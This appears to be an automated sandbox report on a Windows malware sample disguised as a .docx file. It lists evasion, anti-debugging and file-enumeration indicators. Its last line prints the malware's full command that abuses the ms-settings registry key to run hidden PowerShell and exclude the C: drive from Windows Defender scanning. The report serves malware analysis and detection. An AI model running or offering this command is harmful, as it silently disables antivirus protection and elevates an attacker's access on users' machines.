Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299CD74

0_2_0299CD74

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458F7A7 Sleep,ExitProcess,

31_2_0458F7A7

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Opens the same file many times (likely Sandbox evasion)

Source: C:\Windows\SysWOW64\colorcpl.exe

File opened: \Device\RasAcd count: 191293

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\public\xkn.exe

Key value queried: Powershell behavior

Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\xkn.exe	Memory allocated: 1EC81490000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\Public\xkn.exe	Memory allocated: 1EC81490000 memory reserve \| memory write watch			Jump to behavior

Contains functionality to enumerate running services

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

31_2_0459A748

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Window / User API: threadDelayed 389	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 2191	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 974	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 1561
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 493
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 693
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: foregroundWindowGot 1697

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 6.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 6.4 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 9.9 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299CD74

0_2_0299CD74

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\Public\Libraries\drbdmeyP.pif TID: 1312	Thread sleep count: 389 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7316	Thread sleep count: 2191 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7316	Thread sleep count: 974 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8036	Thread sleep time: -42500s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040	Thread sleep time: -4683000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024	Thread sleep time: -493000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8024	Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8040	Thread sleep time: -2079000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029858B4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	8_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	8_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	8_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	12_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	12_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	12_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	12_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	12_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	14_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	14_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	14_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	14_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	17_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	17_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	17_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	17_2_00007FF64B5635B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589253
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	31_2_0459C291
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	31_2_0458C34D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	31_2_0458BD37
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CE879 FindFirstFileExA,	31_2_045CE879
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	31_2_0458880C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458783C FindFirstFileW,FindNextFileW,	31_2_0458783C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	31_2_04599AF5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	31_2_0458BB30

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

31_2_04587C97

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: colorcpl.exe, 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000864000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\colorcpl.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299D920 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

0_2_0299D920

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Process queried: DebugFlags	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B5863FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

8_2_00007FF64B5863FC

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\Public\ger.exe

Code function: 24_2_00007FF7E0A0A29C memset,SearchPathW,CreateFileW,GetFileSize,ReadFile,SetFilePointer,CharNextW,IsCharAlphaNumericW,StrToIntW,IsCharAlphaNumericW,StrToIntW,CharNextW,GetLastError,OutputDebugStringW,CloseHandle,

24_2_00007FF7E0A0A29C

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02997CC8

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029DF3AD mov eax, dword ptr fs:[00000030h]	0_2_029DF3AD
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045C32B5 mov eax, dword ptr fs:[00000030h]	31_2_045C32B5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06421082 mov eax, dword ptr fs:[00000030h]	31_2_06421082
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_06463F64 mov eax, dword ptr fs:[00000030h]	31_2_06463F64

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B56CD90 GetProcessHeap,RtlAllocateHeap,

8_2_00007FF64B56CD90

Enables debug privileges

Source: C:\Users\Public\xkn.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	3_2_004098D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004098F0 SetUnhandledExceptionFilter,	3_2_004098F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004099EC SetUnhandledExceptionFilter,	3_2_004099EC
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	3_1_004098D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004098F0 SetUnhandledExceptionFilter,	3_1_004098F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004099EC SetUnhandledExceptionFilter,	3_1_004099EC
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	8_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	10_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	12_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	14_2_00007FF64B5793B0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B578FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_00007FF64B578FA4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5793B0 SetUnhandledExceptionFilter,	17_2_00007FF64B5793B0
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0ED50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00007FF7E0A0ED50
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A0F050 SetUnhandledExceptionFilter,	24_2_00007FF7E0A0F050
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B4FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_045B4FDC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B49F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_045B49F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045B4B47 SetUnhandledExceptionFilter,	31_2_045B4B47
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045BBB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_045BBB22

Source: C:\Users\Public\xkn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
